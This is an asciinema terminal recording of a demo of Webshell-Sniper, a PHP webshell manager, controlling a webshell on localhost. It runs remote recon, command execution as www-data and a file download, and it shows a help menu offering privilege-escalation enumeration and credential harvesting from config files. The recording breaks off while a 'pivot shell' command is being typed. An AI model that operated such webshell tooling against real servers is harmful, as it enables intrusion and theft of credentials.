{"version": 2, "width": 104, "height": 30, "timestamp": 1782486014, "env": {"TERM": "xterm-256color", "SHELL": "/bin/bash"}}
[0.1964, "o", "\u001b[95m[+] Checking POST http://127.0.0.1:8080/index.php (password='c') ...\u001b[0m\r\n"]
[0.2088, "o", "\u001b[1;32m[+] Webshell is alive.\u001b[0m\r\n"]
[0.2089, "o", "\u001b[1;32m[+] 1 webshell(s) online. Entering interactive mode.\u001b[0m\r\n"]
[0.2199, "o", "\u001b[?12l\u001b[?25h"]
[0.2268, "o", "\r\n===================================================\r\n           ____        _\r\n          / ___| _ __ (_)_ __   ___ _ __\r\n          \\___ \\| '_ \\| | '_ \\ / _ \\ '__|\r\n           ___) | | | | | |_) |  __/ |\r\n          |____/|_| |_|_| .__/ \\___|_|\r\n                      |_|\r\n===================================================\r\n|      WebShell Manager Via Terminal (v2.0.0)     |\r\n|  https://github.com/WangYihang/Webshell-Sniper  |\r\n===================================================\r\n\r\n"]
[0.2283, "o", "\u001b[6n"]
[0.2313, "o", "\u001b[?2004h\u001b[?1l\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[0.2355, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.2099, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.2726, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.3352, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.3978, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.4599, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mrecon\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.5217, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.5836, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.6453, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.7072, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mf\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.7697, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.8327, "o", "\u001b[?25l\u001b[?7l\u001b[23D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mrecon\u001b[0m \u001b[0;33minfo\u001b[23D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[3.8352, "o", "\u001b[1;32m[+] ========================================\u001b[0m\r\n"]
[3.8353, "o", "\u001b[1;32m[+] URL           : http://127.0.0.1:8080/index.php\u001b[0m\r\n\u001b[1;32m[+] Method        : POST\u001b[0m\r\n"]
[3.8387, "o", "\u001b[1;32m[+] Document root : /var/www/html\u001b[0m\r\n"]
[3.84, "o", "\u001b[1;32m[+] PHP version   : 8.3.31\u001b[0m\r\n"]
[3.8587, "o", "\u001b[1;32m[+] Kernel        : Linux 5dd92056d40a 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May  5 \u001b[0m\r\n\u001b[1;32m19:26:24 UTC 2026 x86_64 GNU/Linux\u001b[0m\r\n"]
[3.8596, "o", "\u001b[6n"]
[3.8608, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[3.8621, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.8316, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[0;38;2;102;102;102mecon info\u001b[9D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.8933, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[5.9548, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.0163, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.0779, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mrecon\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.1395, "o", "\u001b[?25l\u001b[?7l\u001b[18D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mrecon\u001b[18D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[6.1422, "o", "\u001b[38;5;208mUsage:\u001b[0m \u001b[38;5;244mrecon\u001b[0m [\u001b[36m-h\u001b[0m] \u001b[36m<action>\u001b[0m \u001b[36m...\u001b[0m\r\n\r\n\u001b[39mTarget reconnaissance.\u001b[0m\r\n\r\n\u001b[38;5;208mOptions:\u001b[0m\r\n  \u001b[36m-h\u001b[0m, \u001b[36m--help\u001b[0m      \u001b[39mshow this help message and exit\u001b[0m\r\n\r\n\u001b[38;5;208mActions:\u001b[0m\r\n  \u001b[36m<action>\u001b[0m\r\n    \u001b[36minfo\u001b[0m          \u001b[39mtarget summary (URL/webroot/php/kernel)\u001b[0m\r\n    \u001b[36mphp\u001b[0m           \u001b[39mPHP version\u001b[0m\r\n    \u001b[36mkernel\u001b[0m        \u001b[39mkernel version (uname -a)\u001b[0m\r\n    \u001b[36mconfigs\u001b[0m       \u001b[39mfind config/DB files in the webroot\u001b[0m\r\n    \u001b[36mwritable\u001b[0m      \u001b[39mfind writable directories\u001b[0m\r\n    \u001b[36mwritable-php\u001b[0m  \u001b[39mfind writable .php files\u001b[0m\r\n    \u001b[36mdisabled\u001b[0m      \u001b[39mlist PHP disabled_functions\u001b[0m\r\n    \u001b[36msuid\u001b[0m          \u001b[39mfind SUID-root binaries\u001b[0m\r\n    \u001b[36mprivesc\u001b[0m       \u001b[39maggregate privesc enumeration\u001b[0m\r\n    \u001b[36mcreds\u001b[0m         \u001b[39mharvest credentials from config files\u001b[0m\r\n\r\n\r\n"]
[6.1428, "o", "\u001b[6n"]
[6.1436, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[6.1442, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.3575, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[0;38;2;102;102;102mecon\u001b[4D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.4193, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.4808, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.5423, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.6039, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mrecon\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.6656, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[0;38;2;102;102;102minfo\u001b[4D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.7275, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.7893, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.8511, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.914, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[8.9758, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.0386, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.1014, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.1641, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.2267, "o", "\u001b[?25l\u001b[?7l\u001b[27D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mrecon\u001b[0m \u001b[0;33mdisabled\u001b[27D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[9.2278, "o", "\u001b[95m[+] [disabled-funcs] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[9.228, "o", "\u001b[33m[!] No PHP functions are disabled.\u001b[0m\r\n"]
[9.2287, "o", "\u001b[6n"]
[9.2299, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[9.231, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.444, "o", "\u001b[?25l\u001b[?7l\u001b[0mf\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.5063, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.5687, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.631, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mfile\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.6934, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.7558, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.8183, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.8807, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[11.9439, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.0066, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.0683, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.13, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.1917, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.2534, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.3152, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.3769, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.4386, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.5003, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.5621, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.6238, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.6855, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.7471, "o", "\u001b[?25l\u001b[?7l\u001b[34D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mfile\u001b[0m \u001b[0;33mls\u001b[0m \u001b[0;33m/var/www/html\u001b[34D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[12.7488, "o", "\u001b[95m[+] [ls] POST http://127.0.0.1:8080/index.php (password='c'): /var/www/html\u001b[0m\r\n"]
[12.7642, "o", "\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\r\n\u2503\u001b[1;36m \u001b[0m\u001b[1;36mmode      \u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36msize\u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36mmtime           \u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36mname     \u001b[0m\u001b[1;36m \u001b[0m\u2503\r\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\r\n\u2502 -rw-rw-r-- \u2502 129  \u2502 2026-06-23 18:29 \u2502 index.php \u2502\r\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\r\n"]
[12.7648, "o", "\u001b[6n"]
[12.7654, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[12.7662, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[14.9575, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.0192, "o", "\u001b[?25l\u001b[?7l\u001b[0md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.0806, "o", "\u001b[?25l\u001b[?7l\u001b[15D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > id\u001b[15D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.0807, "o", "\u001b[?2004l"]
[15.0812, "o", "\u001b[95m[+] [remote] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[15.0914, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\n"]
[15.0925, "o", "\u001b[6n"]
[15.0935, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[15.0948, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.8848, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[16.9474, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.0096, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.0712, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.1328, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mlocal\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.1944, "o", "\u001b[?25l\u001b[?7l\u001b[18D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mlocal\u001b[18D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.1944, "o", "\u001b[?2004l"]
[17.195, "o", "\u001b[95m[+] Bare commands now run on localhost (the prompt shows LOCAL).\u001b[0m\r\n"]
[17.1955, "o", "\u001b[6n"]
[17.1961, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;41;1m LOCAL \u001b[0m ~ >\u001b[11D\u001b[12C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[17.1969, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.5035, "o", "\u001b[?25l\u001b[?7l\u001b[0mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.5657, "o", "\u001b[?25l\u001b[?7l\u001b[0mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.6274, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.6892, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.7509, "o", "\u001b[?25l\u001b[?7l\u001b[0mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.8126, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.8742, "o", "\u001b[?25l\u001b[?7l\u001b[18D\u001b[0m\u001b[J\u001b[0;37;41;1m LOCAL \u001b[0m ~ > whoami\u001b[18D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.8742, "o", "\u001b[?2004l"]
[18.8748, "o", "\u001b[95m[+] [local] whoami\u001b[0m\r\n"]
[18.8776, "o", "ubuntu\r\n"]
[18.8784, "o", "\u001b[6n"]
[18.879, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;41;1m LOCAL \u001b[0m ~ >\u001b[11D\u001b[12C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[18.8797, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.4886, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[0;38;2;102;102;102mecon disabled\u001b[13D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.5503, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.6122, "o", "\u001b[?25l\u001b[?7l\u001b[0mm\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.6739, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.7356, "o", "\u001b[?25l\u001b[?7l\u001b[0mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.7973, "o", "\u001b[?25l\u001b[?7l\u001b[5D\u001b[0;32mremote\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.8589, "o", "\u001b[?25l\u001b[?7l\u001b[18D\u001b[0m\u001b[J\u001b[0;37;41;1m LOCAL \u001b[0m ~ > \u001b[0;32mremote\u001b[18D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[20.8595, "o", "\u001b[95m[+] Bare commands now run on the target (the prompt shows REMOTE).\u001b[0m\r\n"]
[20.8599, "o", "\u001b[6n"]
[20.8605, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[20.8612, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.1698, "o", "\u001b[?25l\u001b[?7l\u001b[0mf\u001b[0;38;2;102;102;102mile ls /var/www/html\u001b[20D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.2315, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.2935, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.3556, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mfile\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.4175, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.4797, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mg\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.5419, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.6036, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.6654, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.7275, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.7893, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.851, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.913, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.9752, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.0372, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.0991, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.1609, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.2226, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.2847, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.3469, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.4091, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.4712, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.5335, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.5959, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.6582, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.7209, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.7836, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.8463, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mx\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.9081, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.9702, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.032, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.0936, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.1553, "o", "\u001b[?25l\u001b[?7l\u001b[45D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mfile\u001b[0m \u001b[0;33mget\u001b[0m \u001b[0;33m/var/www/html/index.php\u001b[45D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.1553, "o", "\u001b[?2004l"]
[24.156, "o", "\u001b[95m[+] [download] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[24.1687, "o", "\u001b[1;32m[+] Saved /var/www/html/index.php -> \u001b[0m\r\n\u001b[1;32m/home/ubuntu/Documents/dev/WangYihang/Webshell-Sniper/127.0.0.1:8080/var/www/html/index.php (129 bytes)\u001b[0m\r\n"]
[24.1693, "o", "\u001b[6n"]
[24.17, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.1708, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.5631, "o", "\u001b[?25l\u001b[?7l\u001b[0mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.6248, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.6871, "o", "\u001b[?25l\u001b[?7l\u001b[0mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.7494, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.8118, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mpivot\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.8742, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.9366, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.999, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.0614, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.1239, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.1864, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.2489, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.3115, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
